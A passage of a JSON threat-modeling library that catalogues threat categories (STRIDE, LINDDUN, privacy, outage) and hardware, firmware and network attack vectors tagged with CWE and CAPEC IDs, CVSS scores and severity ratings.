Failure","Description":"","threatCategorieIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a","0285f001-a384-42de-ae6d-6bfbc488c92c","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","b7935cfe-6a41-45e4-8778-f0fbb1e4018b","5f7607f8-e67d-40f2-a902-33c6cfe298c3","3fb90b77-a990-4d5b-bb8a-fce5e36d8f71"]},{"ID":"fdbef5e1-5195-4c19-9059-918c81091003","Name":"Outage","Description":"","threatCategorieIDs":["f2b91aaf-7d9f-4baf-8713-13d7625174d9","bafd3162-d833-4bf4-beb8-ce95239cb4b4","2c064bb4-aa49-4e20-ad72-333748a5e497","7cf3480c-f4db-47cb-be36-b27deb746c64"]},{"ID":"1f2b7a03-b882-47d8-a6c0-ae693145a60a","Name":"Privacy","Description":"","threatCategorieIDs":["bcd08af5-29bf-4ed8-ab6c-e311e88f4c84","d6eafa9e-6d9d-42aa-a734-0eb11f25607b","11a5c06f-875c-43fa-a01f-79f4819f98dd","787846f0-3f3c-4807-a99d-881383591051","2765e61e-29a9-498e-adf8-4d653f488e3d","af3ee78e-9e83-4bd1-b9b5-13ec28765518","e6ba8518-0074-492c-95e5-ebe89fa601fe"]},{"ID":"a07a29b8-0414-4d10-bf57-71dcb697d734","Name":"Unintentional / Disaster","Description":"","threatCategorieIDs":["21a0d68d-6bc3-4d4b-8ccb-98b70adc07a6","d9a0d5d5-0c36-45df-9815-ae89ec254677"]},{"ID":"0f772ed4-0e03-4ddc-8e4d-200422c299c3","Name":"STRIDE","Description":"","threatCategorieIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","f0e814f3-b3d2-4357-b155-8fffd70ec42e","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},{"ID":"8bd271b7-2f94-4d3d-baae-d59d2b1fa78c","Name":"LINDDUN","Description":"","threatCategorieIDs":["55379fba-d815-4e29-bd4b-9aa674ed6821","5278c995-f9d9-410e-b012-2995ba30c353","700f5437-7d03-4bff-a0e6-50cfb82dc0e5","b98738a0-f79e-4b1e-86df-0e716eb61bc0","da86b5fc-d15d-41f7-a98f-01fe5e143651","aead4d1d-0f64-42b4-a512-cbbc979af3ca","2521b219-3d43-4fd8-bf96-d658eea44d01"]},{"ID":"dd59986c-693d-43ae-8c4f-2b2bb76a60ec","Name":"Safety & Privacy","Description":"","threatCategorieIDs":["17a04fbd-365f-4345-97f8-88d3c7382ec1","7bbfe5d3-8a91-4210-99ab-79f670715e61"]}],"threatCategories":[{"ID":"6de4f75a-bc96-4f32-b18f-867eac0e8fda","Name":"Misuse of computing power","Description":"Starting DDoS attacks; Sending spam mails; Mining of crypto currencies","ImpactCats":[12,13,14,15]},{"ID":"9e715340-1a69-47df-864a-7c3b5a9a678e","Name":"Misuse of electrical power","Description":"Charging the phone; Rewiring to other equipment","ImpactCats":[12,13,14,15]},{"ID":"c46b7c74-5979-409d-8ceb-631b8833c596","Name":"Obtaining of access/control","Description":"","ImpactCats":[4]},{"ID":"c8a14b27-b13f-4358-9f3f-691d01c97c77","Name":"Obtaining of higher priviliges","Description":"","ImpactCats":[4]},{"ID":"b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a","Name":"Keeping access/control","Description":"","ImpactCats":[4]},{"ID":"2dcb00d0-d8a3-4dbc-9efa-d33783a8106b","Name":"Abuse of personal data","Description":"","ImpactCats":[10,13,8,1]},{"ID":"f19e41bd-9fd9-4046-a195-28d441207fa0","Name":"Code/Data tampering/poisoning","Description":"Manipulating the system in order to make it work (slightly) different","ImpactCats":[2]},{"ID":"b869918c-0b47-45c3-8fab-0b698043aa66","Name":"Denial of service","Description":"Putting the system in a state in which it can\'t fulfill it\'s service (e.g., setting invalid configurations, flooding with network requests)","ImpactCats":[3,9,14,15]},{"ID":"6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","Name":"Information disclosure/leaking","Description":"Extracting (secret) information to unauthorized users","ImpactCats":[1,10]},{"ID":"4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","Name":"Privilege abuse","Description":"Reading data/logs to monitor other users; Using insider knowledge for personal gain (e.g., stock trading)","ImpactCats":[1,10,4]},{"ID":"c17cbe5c-3210-42fc-be1e-05f1f915865b","Name":"Repudiation of actions","Description":"Denying performed actions or usage of the system","ImpactCats":[6]},{"ID":"ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d","Name":"Hardware IP theft","Description":"","ImpactCats":[12]},{"ID":"70d07015-4eda-4d1a-8d07-1791f881f8f0","Name":"Software IP theft","Description":"","ImpactCats":[12]},{"ID":"2e50cdf4-cc94-4a32-98ee-825028a1f476","Name":"Process IP theft","Description":"","ImpactCats":[12]},{"ID":"88d19822-b1b0-469f-ae00-1bc600ccaa1d","Name":"Hardware destruction","Description":"","ImpactCats":[3,9,12,14,15]},{"ID":"644f8521-6b49-41bc-86df-4064b89fb881","Name":"Software destruction","Description":"","ImpactCats":[2,3,12,14,15]},{"ID":"96bdc11d-dbb0-4785-8a5c-373e2c492eb0","Name":"Data destruction","Description":"","ImpactCats":[2,3,12,14,15]},{"ID":"3915215b-3414-4b2e-8446-9763398790ec","Name":"Environmental damage","Description":"","ImpactCats":[13]},{"ID":"a6a57921-7fcb-4f54-b0f5-bac0a0f74163","Name":"Financial loss","Description":"","ImpactCats":[12]},{"ID":"bc4b439c-6197-48d3-a308-7fd323d2ea5e","Name":"Human harm","Description":"","ImpactCats":[9]},{"ID":"6b8c08cb-3f02-413a-96b4-179bb1f67997","Name":"Property loss/theft","Description":"","ImpactCats":[12]},{"ID":"4d0bb854-2843-4d47-8b2c-043f7b8e4b4f","Name":"Reputational damage","Description":"","ImpactCats":[13]},{"ID":"08d8fbba-5de4-4538-8674-43e214c3ebad","Name":"Waste of resources","Description":"","ImpactCats":[12]},{"ID":"8a3d81d9-3317-4e5d-88fe-a0e0592295fe","Name":"Traffic sniffing","Description":"","ImpactCats":[1]},{"ID":"d0bcd70c-fbad-4a16-a606-8b0682ae7afe","Name":"Identity and data spoofing","Description":"","ImpactCats":[5,2]},{"ID":"61d04f2d-83b1-4152-9aba-4ad188eef06d","Name":"Surveillance","Description":"","ImpactCats":[1,10]},{"ID":"f7639a0c-e85b-4947-bbec-2ac4a0911827","Name":"Traffic data tampering","Description":"","ImpactCats":[2]},{"ID":"3bdf3019-02dd-4c7f-bffc-90189b39e6a7","Name":"Breach of service-level agreement","Description":"","ImpactCats":[11]},{"ID":"180a9034-735c-44ca-a96a-693cb48ffaa7","Name":"Breach of legislation","Description":"","ImpactCats":[11]},{"ID":"1180824d-9f8a-4a4a-8398-3775c541a360","Name":"Loss of compliance","Description":"","ImpactCats":[11]},{"ID":"647ed950-8b8a-4a3f-b3f0-d9967c7d218f","Name":"Unauthorized use of copyright material","Description":"","ImpactCats":[11]},{"ID":"f2ba26f4-b2da-49a8-aba2-14e42a746d6a","Name":"Application malfunction","Description":"","ImpactCats":[2,9,15]},{"ID":"0285f001-a384-42de-ae6d-6bfbc488c92c","Name":"AI application malfunction","Description":"","ImpactCats":[2,9,15]},{"ID":"f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","Name":"Communication malfunction","Description":"","ImpactCats":[2,3,9,15]},{"ID":"b7935cfe-6a41-45e4-8778-f0fbb1e4018b","Name":"Process malfunction","Description":"","ImpactCats":[2,3,9,15]},{"ID":"5f7607f8-e67d-40f2-a902-33c6cfe298c3","Name":"Hardware failure","Description":"","ImpactCats":[2,3,9,15]},{"ID":"3fb90b77-a990-4d5b-bb8a-fce5e36d8f71","Name":"Software failure","Description":"","ImpactCats":[2,3,9,15]},{"ID":"f2b91aaf-7d9f-4baf-8713-13d7625174d9","Name":"Communication outage","Description":"","ImpactCats":[3,15]},{"ID":"bafd3162-d833-4bf4-beb8-ce95239cb4b4","Name":"Infrastructure outage","Description":"","ImpactCats":[3,15]},{"ID":"2c064bb4-aa49-4e20-ad72-333748a5e497","Name":"Loss of support services","Description":"","ImpactCats":[3,15]},{"ID":"7cf3480c-f4db-47cb-be36-b27deb746c64","Name":"Power outage","Description":"","ImpactCats":[3,15]},{"ID":"21a0d68d-6bc3-4d4b-8ccb-98b70adc07a6","Name":"Environmental conditions","Description":"ToDo: Corrosion, Frostiness, Heat/Fire, Mechanical stress, Over-voltage, Low-voltage, Water, Moisture, Pollution","ImpactCats":[3,15]},{"ID":"d9a0d5d5-0c36-45df-9815-ae89ec254677","Name":"Natural disasters","Description":"","ImpactCats":[3,15]},{"ID":"bcd08af5-29bf-4ed8-ab6c-e311e88f4c84","Name":"Identification","Description":"Identification denotes the threat of associating a (persistent) identifier, e.g. a name and address or a pseudonym of any kind, with an individual and data about him.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"d6eafa9e-6d9d-42aa-a734-0eb11f25607b","Name":"Inventory attacks","Description":"Inventory attacks refer to the unauthorized collection of information about the existence and characteristics of personal things.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"11a5c06f-875c-43fa-a01f-79f4819f98dd","Name":"Lifecycle transitions","Description":"Privacy is threatened when smart things disclose private information during changes of control spheres in their lifecycle.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"787846f0-3f3c-4807-a99d-881383591051","Name":"Linkage","Description":"This threat consists in linking different previously separated systems such that the combination of data sources reveals (truthful or erroneous) information that the subject did not disclose to the previously isolated sources and, most importantly, also did not want to reveal.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"2765e61e-29a9-498e-adf8-4d653f488e3d","Name":"Localization and tracking","Description":"Localization and tracking is the threat of determining and recording a person\u2019s location through time and space.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"af3ee78e-9e83-4bd1-b9b5-13ec28765518","Name":"Privacy-violating interaction and presentation","Description":"This threat refers to conveying private information through a public medium and in the process disclosing it to an unwanted audience. It can be loosely sketched as shoulder- surfing but in real-world environments.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"e6ba8518-0074-492c-95e5-ebe89fa601fe","Name":"Profiling","Description":"Profiling denotes the threat of compiling information dossiers about individuals in order to infer interests by correlation with other profiles and data.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"3bbe354c-317a-4f76-bdbb-75543b5d5aa4","Name":"Spoofing","Description":"","ImpactCats":[5]},{"ID":"f0e814f3-b3d2-4357-b155-8fffd70ec42e","Name":"Tampering","Description":"","ImpactCats":[2]},{"ID":"a77f314c-f74e-4340-a993-5a1a24f26db4","Name":"Repudiation","Description":"","ImpactCats":[6]},{"ID":"369640cc-1b53-4a2e-9e3b-a74c187e68e7","Name":"Information disclosure","Description":"","ImpactCats":[1]},{"ID":"422b9042-212d-4467-a000-2528a2e09f8b","Name":"Denial of Service","Description":"","ImpactCats":[3]},{"ID":"8687e614-c127-418b-8fda-536bb2f0708f","Name":"Elevation of Privileges","Description":"","ImpactCats":[4]},{"ID":"c0bd6e2f-9784-4c11-9aee-115a966e0a4d","Name":"Execution of unauthorized code","Description":"","ImpactCats":[1,2,3,4,5,6,9,10]},{"ID":"55379fba-d815-4e29-bd4b-9aa674ed6821","Name":"Linkability","Description":"An adversary is able to link two items of interest without knowing the identity of the data subject(s) involved.","ImpactCats":[10]},{"ID":"5278c995-f9d9-410e-b012-2995ba30c353","Name":"Identifiability","Description":"An adversary is able to identify a data subject from a set of data subjects through an item of interest.  \u200b","ImpactCats":[10]},{"ID":"700f5437-7d03-4bff-a0e6-50cfb82dc0e5","Name":"Non-Repudiation","Description":"The data subject is unable to deny a claim (e.g., having performed an action, or sent a request).","ImpactCats":[10]},{"ID":"b98738a0-f79e-4b1e-86df-0e716eb61bc0","Name":"Detectability","Description":"An adversary is able to distinguish whether an item of interest about a data subject exists or not, regardless of being able to read the contents itself.","ImpactCats":[10]},{"ID":"da86b5fc-d15d-41f7-a98f-01fe5e143651","Name":"Disclosure of Information","Description":"An adversary is able to learn the content of an item of interest about a data subject.","ImpactCats":[10,1]},{"ID":"aead4d1d-0f64-42b4-a512-cbbc979af3ca","Name":"Unawareness","Description":"The data subject is unaware of the collection, processing, storage, or sharing activities (and corresponding purposes) of the data subject\u2019s personal data.","ImpactCats":[10]},{"ID":"2521b219-3d43-4fd8-bf96-d658eea44d01","Name":"Non-Compliance","Description":"The processing, storage, or handling of personal data is not compliant with legislation, regulation, and/or policy.","ImpactCats":[10]},{"ID":"17a04fbd-365f-4345-97f8-88d3c7382ec1","Name":"Safety","Description":"Threats threatening the safety of operation, humans, and machines","ImpactCats":[9]},{"ID":"7bbfe5d3-8a91-4210-99ab-79f670715e61","Name":"Privacy","Description":"Threats threatening the privacy","ImpactCats":[10]}],"attackVectorGroups":[{"ID":"e17870ae-2c37-435c-a284-8df90ff7a5f0","Name":"Threat Library","Description":"","attackVectorGroupIDs":["037c0934-3db3-4320-a580-3581ec92f627","4e160ff0-f1c9-4d2b-a470-6b23ab9c8868","bee6117a-63ee-41b5-b77a-dd2b2b25cec8","a1ddc171-0321-4131-ae58-25b39006320a","e112d000-a2e3-40c0-acdc-1b7856ad99e0","fa6a378a-0e74-43b0-960b-b37576081160","29a5994a-1de4-46e2-94c4-3b9832fff28e","e98488d0-f4ac-49ad-8648-d32ae9563225","1a63ed36-ee55-4773-89d5-8cd466f34cad","98dacc1a-f9e4-46b0-84c2-8718d9301cbb"],"attackVectorIDs":[]},{"ID":"037c0934-3db3-4320-a580-3581ec92f627","Name":"Cryptography Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["0ffd675d-d83c-4f74-8835-398e7f3930cb","31f89637-4b8a-41e9-acac-9d012767a424","97b5a1d4-be82-4485-82f6-e4532795a20b","a20d6e53-4426-4700-a04f-a4018bc7bfce","680ceebd-357c-49d6-8bfd-390dc6c51dde","a0729a41-bcc9-43d8-9c86-bfb26c64e93c","04d5f07e-2482-451b-9e24-94cb650da53b"]},{"ID":"4e160ff0-f1c9-4d2b-a470-6b23ab9c8868","Name":"Network Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["e58fcbde-e429-4704-9f22-c00d187994bc","8f9a24d4-e962-4136-b0ec-8e9f797a6f62","23c3a785-a539-4570-aee0-42bdffb43983","0b47795b-b42d-49d1-bf50-7f4889994fea","bb7358c1-e5b6-424f-962d-daab17345b63","001ba17c-0400-4369-912e-0ceda3ccd227","1447713d-9ad6-454e-81d8-c9f4ef34c72b","f5949698-47d4-48ee-a116-2d212695c41f","b8835cb9-3c77-496e-ac2d-2ed6fa7f2d78","c7787e71-5c70-462c-9558-ce20e7cfdfe8","4e007b60-94e7-4df3-b3bd-109eb8627da2"]},{"ID":"bee6117a-63ee-41b5-b77a-dd2b2b25cec8","Name":"Chip-Level Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["b703d3d9-1f29-480a-b7ad-b11716727a91","8a6476b9-7a5c-4306-bd43-db6fe32bbf66","1a99fb9b-d1f0-4215-93a6-5cd9fd272026","9e85cf25-febb-46ca-a5f5-c6283412a87b","c097b67f-1179-4f30-924c-3a4e54c04d9d","d4292863-c64e-4123-806f-71590ec76ed3","e6c3d6f5-f4c7-48b7-b516-2092c3557c81"]},{"ID":"a1ddc171-0321-4131-ae58-25b39006320a","Name":"PCB-Level Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["f6ddb913-05ab-485a-a736-46a3f7466f85","5605adab-044a-4b1f-9344-90a602d8d448","e851a284-6b41-41c9-9efd-dc8b01f788da","be14adbc-19a7-48c8-8f13-2566559e63e2","915f674e-926b-4bd9-94cb-ee8b4637bc80","184cd5e5-2517-4d7f-a81a-c411942d3601"]},{"ID":"53298967-848a-4d3f-8577-a54d76942a8e","Name":"Sub Group","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":[]},{"ID":"c3c1c9ff-637f-4964-8de5-994de73927f8","Name":"Sub Sub Group","Description":"","attackVectorGroupIDs":["dbbb888b-1a29-4ba4-8245-9af87316f4f9"],"attackVectorIDs":[]},{"ID":"dbbb888b-1a29-4ba4-8245-9af87316f4f9","Name":"Sub Sub Sub Group","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":[]},{"ID":"e112d000-a2e3-40c0-acdc-1b7856ad99e0","Name":"Firmware Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["99864969-3b71-45ad-bae5-09bc4ecc5cc1","24645edb-85ac-438b-9033-ba2721c3e2c7","5656f112-8443-4245-aa38-38cd9d9375e0","f0a8edb7-d65f-423f-a391-120d1eb04e02","01a37617-b7ac-446a-86fa-e70c957d154c","97c0d7a1-13c7-43d5-b03c-75845f973af5","ef144ae1-4c70-400e-8222-b8a7dd3bf3e9","d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","c23a62c8-901a-412b-80b8-d2574103b733","83d23b79-71c5-488e-adb2-dd0f76d70f44","f170308a-c188-4ae0-bcef-d04af1e429b3","eab94c5b-f7e8-4b2a-9ffb-658aefc8f0d0"]},{"ID":"fa6a378a-0e74-43b0-960b-b37576081160","Name":"Application Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["7dc1eb8e-2312-4b2f-becf-f9725d45cdce","d92ccd9c-3a24-4e07-a2ca-c1e9949bb386","1a511f9e-5d1b-47b9-9071-4d39407cc75c","9538abd8-f79c-4097-b2dd-716e50a125ee","573881b4-ceb6-4d6a-a5c3-9c0e6c5a3b3c","a76b8768-9d68-4074-b5e1-0f9abc61bcda","cf63f187-4353-4bf8-bc37-a7392c6d91bf","66c5f951-6286-4b22-a71a-ee4d6232f689","06c24920-2ce3-49ca-8134-9fa81fb2cdef","71f761e4-8149-4a88-92fd-35f9d99cc0ef","6bf04ffa-1f83-4637-a866-d02ff10d752b","e36eff83-1863-4026-bffe-966a9a104331","6509fe5f-7e27-40ec-bd08-97e29c67f8c1","ed84da5f-3181-4be1-bef4-d911077b1910","b26fc3e4-7a38-4f00-acdb-ec78246d0b25","3162421f-ca5b-400d-bbe8-58a510be9abf","b48781b2-24a2-481b-b7c1-3390dbeeb973","e060675a-41d0-4c4d-9e16-311bb4adec7b"]},{"ID":"29a5994a-1de4-46e2-94c4-3b9832fff28e","Name":"Supply Chain Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["327a2f35-8cf5-46d5-a973-a174f6f7be23","90a4e8f3-c750-47c4-97fd-fa9e25b9b599","21c6b5ef-82c7-41e5-bb07-de93445b2156","a912b48a-3b4d-44ab-b8f3-28000ca945c4"]},{"ID":"e98488d0-f4ac-49ad-8648-d32ae9563225","Name":"Ecosystem Weaknesses","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["30cf5142-2339-4130-8a6e-2b05869e6df2","afd4bceb-31b0-41cd-9eae-02d2eba6b41c","7742f998-ab1e-4f64-8ac6-12b3f97b936a"]},{"ID":"1a63ed36-ee55-4773-89d5-8cd466f34cad","Name":"User Behavior","Description":"","attackVectorGroupIDs":["abf604c4-90f4-41fe-9084-dd2c655d12e8"],"attackVectorIDs":["195d942e-02f8-49ad-873f-299f4b4ad4ec","ffd6083b-7183-472c-b250-15b0de223735"]},{"ID":"98dacc1a-f9e4-46b0-84c2-8718d9301cbb","Name":"Credential Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["f0ef09ed-0cde-4b12-beb6-f1640132f3e6","0e3c0e3e-1587-46f8-93ea-e9091dff5958","b9436449-7896-4be6-89f8-a19e1c8d014f","5435aa9a-ad52-470f-8fa5-81a4f926b6a6","723dfb40-4ceb-4232-bda5-73bcb3c76ac0","5e7fd04c-0e14-4c76-800d-f581bcf7c7f6","63dfaefa-c8a8-4725-b6d6-2efff7306639","296e95fe-e06d-4ae3-be84-da98df4a122c","4ee3fc8a-87a5-4fdf-868f-fb35cd12dc91","bf289171-82c3-431a-b3f1-28d17e5a6546","2f483201-0209-4320-ba2e-2d692274aab5","05e04798-41ce-4919-a92b-264f7e985de2","0217b20a-5e3a-4244-8dce-819e28050a47","1909127e-50bd-4892-8b1f-1a2123a4fa61"]},{"ID":"abf604c4-90f4-41fe-9084-dd2c655d12e8","Name":"Social Engineering","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["cf948333-b659-40ff-b93f-d4bdc8c980d1"]}],"attackVectors":[{"ID":"0ffd675d-d83c-4f74-8835-398e7f3930cb","Name":"Insufficient random values","Description":"Use of insufficiently random values","OriginTypes":[1],"ThreatIntroduced":["C","I"],"Weakness":{"CWEID":330},"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"ThreatExploited":["O"],"Severity":2},{"ID":"e58fcbde-e429-4704-9f22-c00d187994bc","Name":"Man-in-the-Middle attack","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["I"],"AttackTechnique":{"CAPECID":94,"CVSS":{"AV":"N","AC":"L","PR":"N","UI":"N","S":"U","C":"H","I":"H","A":"L","Score":9.4,"Notes":{}}},"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"ThreatExploited":["O"],"Severity":4},{"ID":"f6ddb913-05ab-485a-a736-46a3f7466f85","Name":"Reverse engineering/Cloning","Description":"Extracting the PCB design to understand or clone the product; e.g., by CAD file theft or modern reverse engineering techniques","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":[],"AttackTechnique":{"CVSS":{"AV":"P","AC":"L","PR":"N","UI":"N","S":"","C":"H","I":"L","A":"N","Score":5.2}},"threatCategorieIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"],"ThreatExploited":["I","P","O"],"Severity":2},{"ID":"b703d3d9-1f29-480a-b7ad-b11716727a91","Name":"Hardware trojan","Description":"Malicious design modification / insertion of a hardware Trojan","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["C","I","P"],"Adversaries":"Untrusted foundry, untrusted IP vendor, untrusted CAD tool, untrusted design facilities","threatCategorieIDs":[],"ThreatExploited":["O"],"AttackTechnique":{"CAPECID":539,"CVSS":{}},"Severity":3},{"ID":"99864969-3b71-45ad-bae5-09bc4ecc5cc1","Name":"Firmware not updatable","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1277},"ThreatIntroduced":["C","I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":4},{"ID":"31f89637-4b8a-41e9-acac-9d012767a424","Name":"Risky crypto implementation","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1240},"ThreatIntroduced":["C","I"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"],"ThreatExploited":["O"],"Severity":3},{"ID":"8a6476b9-7a5c-4306-bd43-db6fe32bbf66","Name":"Improper debug access control","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1191},"ThreatIntroduced":["I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":2},{"ID":"1a99fb9b-d1f0-4215-93a6-5cd9fd272026","Name":"Internal asset exposure","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1244},"ThreatIntroduced":["I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":2},{"ID":"9e85cf25-febb-46ca-a5f5-c6283412a87b","Name":"Improper restriction to hardware features","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1256},"ThreatIntroduced":["I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":2},{"ID":"24645edb-85ac-438b-9033-ba2721c3e2c7","Name":"Overlap between protected memory ranges","Description":"","OriginTypes":[1],"Weakness":{},"ThreatIntroduced":["I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"ThreatExploited":["O"],"Severity":2},{"ID":"5656f112-8443-4245-aa38-38cd9d9375e0","Name":"Sensitive information uncleared","Description":"Sensitive information in memory (SRAM) must be cleared when the system performs a power or debug state transition. For example, SRAMs keep their data after a software reset.","OriginTypes":[1],"Weakness":{"CWEID":1272},"ThreatIntroduced":["I"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"ThreatExploited":["O"],"Severity":2},{"ID":"f0a8edb7-d65f-423f-a391-120d1eb04e02","Name":"Boot code protection","Description":"Manipulation of boot code in volatile memory to bypass secure boot.","OriginTypes":[1],"Weakness":{"CWEID":1274},"ThreatIntroduced":["C","I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":3},{"ID":"c097b67f-1179-4f30-924c-3a4e54c04d9d","Name":"Physical side channel attacks","Description":"Physical side channels expose sensitive information due to patterns in physically observable phenomena such as variations in power consumption, electromagnetic emissions, or acoustic emissions.","OriginTypes":[1],"Weakness":{"CWEID":1300},"ThreatIntroduced":["C","I"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"ThreatExploited":["O"],"Severity":2},{"ID":"5605adab-044a-4b1f-9344-90a602d8d448","Name":"Firmware dumping","Description":"Extracting the firmware via physical interfaces","OriginTypes":[1],"Weakness":{"CWEID":1324},"ThreatIntroduced":["P"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","70d07015-4eda-4d1a-8d07-1791f881f8f0"],"Severity":3},{"ID":"01a37617-b7ac-446a-86fa-e70c957d154c","Name":"Firmware overwrite","Description":"Overwriting the firmware via a physical interface","OriginTypes":[1],"Weakness":{},"ThreatIntroduced":["I","P"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"],"Severity":4},{"ID":"d4292863-c64e-4123-806f-71590ec76ed3","Name":"Improper isolation of shared resoruces","Description":"For example, a specific memory range is only accessible with higher privileges. However, the memory is mapped to another range with unrestricted access. See CWE for more examples.","OriginTypes":[1],"Weakness":{"CWEID":1189},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":2},{"ID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","Name":"Flooding","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"],"AttackTechnique":{"CAPECID":125,"CVSS":{"AV":"N","AC":"L","PR":"N","UI":"N","S":"U","C":"L","I":"N","A":"H","Score":8.2}},"Severity":2},{"ID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","Name":"Log manipulation","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["C","I"],"ThreatExploited":["O","M"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b"],"AttackTechnique":{"CAPECID":93,"CVSS":{"AV":"L","AC":"L","PR":"","UI":"N","S":"U","C":"L","I":"L","A":"N","Score":5.1}},"Severity":2},{"ID":"327a2f35-8cf5-46d5-a973-a174f6f7be23","Name":"Data from decommissioned device","Description":"","OriginTypes":[1,2],"Weakness":{"CWEID":1266},"ThreatIntroduced":["C","I"],"ThreatExploited":["E"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":675,"CVSS":{"AV":"L","AC":"L","PR":"N","UI":"N","S":"U","C":"H","I":"N","A":"N","Score":6.2}},"Severity":3},{"ID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","Name":"Personally identifiable info exposure","Description":"","OriginTypes":[1],"Weakness":{"CWEID":359},"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{}},"Severity":4},{"ID":"23c3a785-a539-4570-aee0-42bdffb43983","Name":"Radio 